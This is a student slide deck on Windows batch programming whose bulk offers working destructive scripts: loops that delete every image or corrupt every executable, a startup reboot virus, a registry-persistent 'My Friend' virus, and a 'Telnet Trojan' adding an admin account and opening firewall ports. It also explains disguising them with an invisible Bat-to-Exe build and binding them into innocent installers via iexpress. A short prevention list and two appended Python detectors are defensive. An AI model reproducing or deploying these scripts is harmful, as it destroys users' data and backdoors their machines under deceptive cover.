
Batch File Programming (Virus Attacks)

Dangerous.bat
Introduction.
Structure.
Operators.
Syntax.
Fun.
Utilities.
Virus Attacks.
Preventions.
Presented by Yogendra Kirar
M.C.A Final year.

Introduction.
Batch processing explained (in MS-Windows)

Batch processing means that a set of distinct processes or tasks executes one after another as a group, bunch, or batch.
Here, in Windows, a batch file is a bunch of DOS (Disk Operating System) commands, each command on a new line.
With effective batch file programming, many utilities, funny items, or viruses that harm Windows machines can be prepared.
A good batch file programmer must have deep knowledge of DOS commands.

Introduction.
The steps for making any batch file are:

Open Notepad.
Type the DOS commands, each on a new line.
Save the file with the .bat extension.
To execute it, double-click the file, which shows the default icon of batch files in Windows OS.

Structure
Example: running a DOS command.
Start > Run > cmd
The cmd window then opens.
Now type any MS-DOS command.
You can control the entire operating system through DOS commands.
For more commands, type help and press Enter.

Structure
Working of the file
When we click a batch file:
- First, it opens the file, reads the first line, and runs that command in the command prompt.
- Then it closes the file.
- It opens the file again, runs the second line, then closes it.
- This open, run, close cycle continues until the commands end and the script exits.
Note: each command must be on a new line.

Operators.
Operators as Accelerators
With batch files, which are also called batch programs or scripts, you can simplify routine or repetitive tasks.
-Call
-Echo
-For
-Rem
-Goto
-Shift
-Setlocal
-Endlocal
-If

Syntax
Syntax (mostly used)

call [[Drive:][Path] FileName [BatchParameters]] [:label [arguments]]
echo [{on|off}] [message]
for {%variable|%%variable} in (set) do command [CommandLineOptions]
rem [comment]
goto label

Fun
Undeletable Folder with Your Name.
This code creates a folder on the desktop and in the root of every drive of your computer. Because the loop keeps recreating it, the folder cannot simply be deleted.
--------------------------------------------------------------------------------------
:y
md C:\"Documents and Settings"\"All Users"\Desktop\yogendra
md c:\yogendra
md d:\yogendra
md e:\yogendra
md f:\yogendra
md g:\yogendra
md h:\yogendra
goto y
--------------------------------------------------------------------------------------
Copy this code into Notepad and save it as anyname.bat.

Important:
Here, all of you may have a question or doubt in mind: is this true?
You may think that if the black command prompt window stays on the desktop or taskbar, anyone can become suspicious of it, and if somebody closes it, the batch file execution stops.
The solution is Batch to Exe converter software, which converts a batch file into an exe. The file then runs in the background and is uncatchable.
Bat2exe:
You can download this from the URL: http://www.brothersoft.com/d.php?soft_id=50301&url=http%3A%2F%2Fwww.f2ko.de%2Fdownloads%2FBat_To_Exe_Converter.zip

[Snapshot: Bat to Exe converter. Callouts: source path (.bat file); output path (.exe file); check "invisible application"; finally compile the file.]

Fun

Can't do anything
This code creates a file that ends explorer.exe, and everything is gone.
Code:
--------------------------------------------------------------------------------------
Taskkill /im explorer.exe /f
--------------------------------------------------------------------------------------

Fun

Many Folders
This code creates thousands of folders with numeric names.

Code:
----------------------------------------------------------------------
:e
Md %random%
Goto e
----------------------------------------------------------------------

Fun
Rotating Clock Hands
This code rotates the clock's hands continuously.
Code:
--------------------------------------------------------------------------------------
:y
time = 12:05:12
time = 12:10:12
time = 12:15:12
time = 12:20:12
time = 12:25:12
time = 12:30:12
time = 12:35:12
time = 12:40:12
time = 12:45:12
time = 12:50:12
time = 12:55:12
goto y
--------------------------------------------------------------------------------------

Utilities

Along with funny things, we can also make some utilities for Windows machines.
These are utilities which help us maintain our system: speed, performance, hard disk maintenance.
With a batch file we can also create a scheduled task.

Utilities
Disk defragmenter file.
This file is used to defragment your hard disk. Copy this file into the location:
C:\Documents and Settings\All Users\Start Menu\Programs\Startup
Code:
--------------------------------------------------------------------------------------
Defrag c: -f
Defrag d: -f
Defrag e: -f
Defrag f: -f
Msg * Defragment is completed
--------------------------------------------------------------------------------------

Utilities
Steganography code:
Code:

----------------------------------------------------------------------
Copy /b %1 + /b %2 new.jpg
exit
----------------------------------------------------------------------
Save this code as hide.bat.
Hiding process
1. Copy hide.bat into a folder.
2. Copy a JPEG file and the text file which we want to hide behind the JPEG into that folder.
3. Run hide.bat from the DOS prompt, providing the names of the JPEG file and the text file in that order (.jpeg <space> .txt). A new.jpg is created with the text hidden in it.
4. To get your text back, open this JPEG in Notepad and find your text at the end of the file.
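
Because copy /b only concatenates the two files, the text sits in the clear after the JPEG's end-of-image (EOI) marker, which makes this kind of hiding easy to detect. The Python check below is an added example, not part of the original slides; it walks the JPEG segments and returns whatever follows EOI. The sample bytes are constructed for the demonstration.

```python
import struct

# Markers without a length field: TEM, RST0-RST7, SOI.
STANDALONE = {0x01, 0xD8} | set(range(0xD0, 0xD8))

def jpeg_trailing_data(data: bytes) -> bytes:
    """Return the bytes found after the JPEG end-of-image (EOI) marker.

    The segments are walked one by one rather than searching for FF D9,
    because an embedded thumbnail or the appended data can contain it too.
    """
    if data[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG: missing SOI marker")
    pos = 2
    while pos + 1 < len(data):
        if data[pos] != 0xFF:
            raise ValueError(f"expected a marker at offset {pos}")
        marker = data[pos + 1]
        if marker == 0xD9:                  # EOI: the image ends here
            return data[pos + 2:]
        if marker == 0xFF:                  # fill byte before a marker
            pos += 1
            continue
        if marker in STANDALONE:
            pos += 2
            continue
        if pos + 4 > len(data):
            break
        (length,) = struct.unpack(">H", data[pos + 2:pos + 4])
        pos += 2 + length                   # skip marker and segment body
        if marker == 0xDA:                  # SOS: entropy-coded data follows
            # In scan data FF 00 is a stuffed byte and FF D0-D7 are restarts.
            while pos + 1 < len(data):
                nxt = data[pos + 1]
                if data[pos] == 0xFF and nxt != 0x00 and not 0xD0 <= nxt <= 0xD7:
                    break
                pos += 1
    raise ValueError("truncated JPEG: no EOI marker found")

# Constructed sample: SOI, APP0 segment, SOS header, scan data, EOI.
CLEAN = (b"\xff\xd8" b"\xff\xe0\x00\x04AB" b"\xff\xda\x00\x04\x01\x02"
         b"\x12\xff\x00\x34\xff\xd0\x56" b"\xff\xd9")
# Constructed stand-in for the output of hide.bat (image followed by text).
COMBINED = CLEAN + b"constructed hidden note \xff\xd9 end\r\n"

if __name__ == "__main__":
    print(jpeg_trailing_data(CLEAN))       # nothing after EOI
    print(jpeg_trailing_data(COMBINED))    # the appended text
```

Any non-empty result on a JPEG received from outside is worth a closer look, since ordinary encoders write nothing after EOI.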

Utilities
Refresh.
Code:
----------------------------------------------------------------------
taskkill /im explorer.exe /f
start explorer.exe
----------------------------------------------------------------------

Scheduled Shutdown:
Code:
----------------------------------------------------------------------
At [time] shutdown -s -f -t 00 -c "Message"
----------------------------------------------------------------------

Virus Attacks
System restart virus.
This batch file code restarts the system whenever it starts.
Code:
--------------------------------------------------------------------------------------
echo shutdown r f t 00 > shut.bat
move shut.bat C:\"Documents and Settings"\"All Users"\"Start
Menu"\Programs\Startup
--------------------------------------------------------------------------------------

Copy the above code, paste it into Notepad, save it as anything.bat, and run it on a PC. After the next restart the system will never start up normally and will restart automatically.

Virus Attacks
For loop viruses

For is a looping operator which creates a loop for any command.
This code creates messages on the desktop saying that files are corrupted.
--------------------------------------------------------------------------------------
Code:
For /r c:\ %%y in (*.*) do msg * %%y ------ is Corrupted.
It does not actually corrupt the files; it only shows messages.
--------------------------------------------------------------------------------------
Note: conversion into exe is required.

Virus Attacks
For loop viruses

2 (Damage level :High)

For is a looping operator which creates a loop for any command.
1. This code will remove all images and wallpapers from your system.
Warning! -- Try it at your own risk.
Code:
for /r c:\ %%y in (*.jpg,*.png,*.gif,*.ico) do del %%y /s/q
for /r d:\ %%y in (*.jpg,*.png,*.gif,*.ico) do del %%y /s/q
for /r e:\ %%y in (*.jpg,*.png,*.gif,*.ico) do del %%y /s/q
for /r f:\ %%y in (*.jpg,*.png,*.gif,*.ico) do del %%y /s/q
Note: conversion into exe is required.

Virus Attacks
For loop viruses

3 (Damage level :High)

For is a looping operator which creates a loop for any command.
1. This code will corrupt all exe files of your system.
Warning! -- Try it at your own risk.
Code:
echo 00967jyj875kkj6704ekfkf9iddkc224543453000 >
c:\tempero.null
for /r c:\ %%y in (*.exe) do copy /b %%y + c:\tempero.null
for /r d:\ %%y in (*.exe) do copy /b %%y + c:\tempero.null
for /r e:\ %%y in (*.exe) do copy /b %%y + c:\tempero.null
for /r f:\ %%y in (*.exe) do copy /b %%y + c:\tempero.null
del c:\tempero.null /s/q
Note: conversion into exe is required.

Virus Attacks
For loop viruses

4 (Damage level :High)

For is a looping operator which creates a loop for any command.
1. This code will corrupt all exe files of your system.
Warning! -- Try it at your own risk.
Code:
echo you lost all !!!! >c:\tempero.null
for /r c:\ %%y in (*.exe) do copy c:\temporal.null
for /r d:\ %%y in (*.exe) do copy c:\temporal.null
for /r e:\ %%y in (*.exe) do copy c:\temporal.null
for /r f:\ %%y in (*.exe) do copy c:\temporal.null
del c:\tempero.null /s/q
Note: conversion into exe is required.

My Friend Virus (Dangerous level: High)

@echo off
rename mypic.exe igfx.exe
if exist c:\windows\system32\igfx.exe goto code
if exist d:\windows\system32\igfx.exe goto code
if exist e:\windows\system32\igfx.exe goto code
if exist f:\windows\system32\igfx.exe goto code
if exist g:\windows\system32\igfx.exe goto code
echo Windows Registry Editor Version 5.00>yog.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]>>yog.reg
if exist c:\windows\nul echo "yhlsagent"="c:\\windows\\system32\\igfx.exe">>yog.reg
if exist d:\windows\nul echo "yhlsagent"="d:\\windows\\system32\\igfx.exe">>yog.reg
if exist e:\windows\nul echo "yhlsagent"="e:\\windows\\system32\\igfx.exe">>yog.reg
if exist f:\windows\nul echo "yhlsagent"="f:\\windows\\system32\\igfx.exe">>yog.reg
if exist g:\windows\nul echo "yhlsagent"="g:\\windows\\system32\\igfx.exe">>yog.reg
echo "avast!"="C:\\PROGRA~1\\Disp.exe">>yog.reg
echo "avgnt"="C:\\PROGRA~1\\avg.exe">>yog.reg
echo "USB Antivirus"="C:\\Program Files\\Guard.exe">>yog.reg
regedit /s yog.reg
del yog.reg /s/q
echo Windows Registry Editor Version 5.00>yog.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]>>yog.reg
echo "LegalNoticeCaption"="Say Happy Birthday to me">>yog.reg
echo "LegalNoticeText"="I want that you wish to me on my birthday. I am very alone person, I have no any friend, do u want to become my friend, please accept me as
ur friend, all the best my friend for ur all works in future, I want to ask u a question would u be alone as me, so plz develop ur interest in making friends like
me. !!!!!!!!!!!">>yog.reg
regedit /s yog.reg
del yog.reg /s/q
if exist c:\windows\nul copy igfx.exe c:\windows\system32
if exist d:\windows\nul copy igfx.exe d:\windows\system32
if exist e:\windows\nul copy igfx.exe e:\windows\system32
if exist f:\windows\nul copy igfx.exe f:\windows\system32
if exist g:\windows\nul copy igfx.exe g:\windows\system32
:code
shutdown -r -f -t 600
:e
if exist c:\windows\nul md C:\Docume~1\Admini~1\Desktop\"I always with u my friend"
if exist d:\windows\nul md d:\Docume~1\Admini~1\Desktop\"I always with u my friend"
if exist e:\windows\nul md e:\Docume~1\Admini~1\Desktop\"I always with u my friend"
if exist f:\windows\nul md f:\Docume~1\Admini~1\Desktop\"I always with u my friend"
if exist g:\windows\nul md g:\Docume~1\Admini~1\Desktop\"I always with u my friend"
taskkill /im USBGuard.exe /f
taskkill /im notepad.exe /f
taskkill /im SOUNDMAN.exe /f
taskkill /im taskmgr.exe /f
date 02-12-3060
goto e

conversion into exe is required

Telnet Trojan.
Works as a remote administration tool through the use of telnet.
@echo off
sc config tlntsvr start= auto
net start tlntsvr
netsh firewall add portopening TCP 23 "Telnet"
sc config termservice start= auto
net start termservice
netsh firewall add portopening TCP 3389 "Remote Desktop"
net user Default 12345 /add
net localgroup administrators Default /add
By Sourabh Mishra.

Finishing Virus Coding
First, copy all this code into Notepad and save it under any name with the .bat extension.
Now convert this .bat file into an .exe file with the help of the Bat to Exe converter.
This is the software which helps us hide the cmd code and run the process in the background.
[Diagram: File.bat -> File.exe]

Finishing Virus Coding
After converting the .bat file into an .exe file, what to do next?

All of you are thinking: these are .exe files, so how do they spread? The answer is the software which resides in the directory c:\windows\system32\ with the name iexpress. To start iexpress: Start > Run > iexpress
You will see this window; this is your mixing software.

Finishing Virus Coding
Follow the instructions of the software; after pressing Next a few times you will find this window.
Here, add your viral code and the innocent software (exe) to which you want to bind it.

Finishing Virus Coding
After that, in the two selection windows, first select the location of the innocent software (exe), then in the second window select your viral code (exe).
Follow the instructions and your new software setup is created, which looks innocent but contains a harmful virus.
When we install this software, the added virus code runs after the installation.

Finishing Virus Coding
Mixing process: .bat -> .exe -> setup.exe

Prevention (Conclusion)
Some possible preventions or conclusions are:

1. Do not accept any file with a .bat or .exe extension over the internet, whether while chatting or from your mailbox.
2. Do not take software from untrusted vendors.
3. Always check your autoruns via Start > Run > msconfig > Startup. If you find something suspicious, locate its path and remove it after checking it.
4. These batch viruses are not very advanced, but they have very dangerous capabilities, and only a strong, updated antivirus can catch them, so always keep your antivirus updated.
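
To complement points 1, 3 and 4, a received .bat file can be screened before anyone runs it. The Python triage below is an added example, not part of the original slides; it flags the behaviours shown in this deck (Startup-folder drops, Run-key writes, recursive deletes, new administrator accounts, firewall openings). The rule names and the sample script are constructed for the demonstration, and a clean result does not prove a script is safe.

```python
import re

# Behaviours described in this deck, as (rule name, pattern) pairs.
RULES = [
    ("startup-folder-drop", r"\\programs\\startup"),
    ("run-key-persistence", r"\\currentversion\\run(once)?\b"),
    ("silent-registry-import", r"\bregedit\s+/s\b"),
    ("kills-shell-or-taskmgr", r"\btaskkill\b.*/im\s+(explorer|taskmgr)\.exe"),
    ("recursive-delete", r"\bfor\s+/r\b.*\bdo\s+del\b"),
    ("recursive-exe-overwrite", r"\bfor\s+/r\b.*\*\.exe.*\bdo\s+copy\b"),
    ("remote-service-enabled", r"\bsc\s+config\s+(tlntsvr|termservice)\s+start=\s*auto"),
    ("firewall-port-opened", r"\bnetsh\s+firewall\s+add\s+portopening\b"),
    ("local-account-added", r"\bnet\s+user\s+\S+\s+\S+\s+/add\b"),
    ("admin-group-change", r"\bnet\s+localgroup\s+administrators\s+\S+\s+/add\b"),
]
COMPILED = [(name, re.compile(pat, re.IGNORECASE)) for name, pat in RULES]

def triage(script_text):
    """Return (line number, rule name) for every rule hit in a batch script."""
    findings = []
    for lineno, raw in enumerate(script_text.splitlines(), start=1):
        # Drop quotes so that C:\"Start Menu"\Programs matches like a plain path.
        line = raw.strip().replace('"', "")
        if not line or line.lower().startswith(("rem ", "::")):
            continue                      # skip blank lines and comments
        for name, rx in COMPILED:
            if rx.search(line):
                findings.append((lineno, name))
    return findings

# Constructed sample script (names and password are placeholders).
SAMPLE = r"""@echo off
rem constructed sample for the triage rules
echo hello
defrag c: -f
move helper.bat C:\"Documents and Settings"\"All Users"\"Start Menu"\Programs\Startup
net user exampleuser ExamplePass1 /add
net localgroup administrators exampleuser /add
netsh firewall add portopening TCP 23 "Telnet"
"""

if __name__ == "__main__":
    for lineno, rule in triage(SAMPLE):
        print(f"line {lineno}: {rule}")
```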

Have any questions?
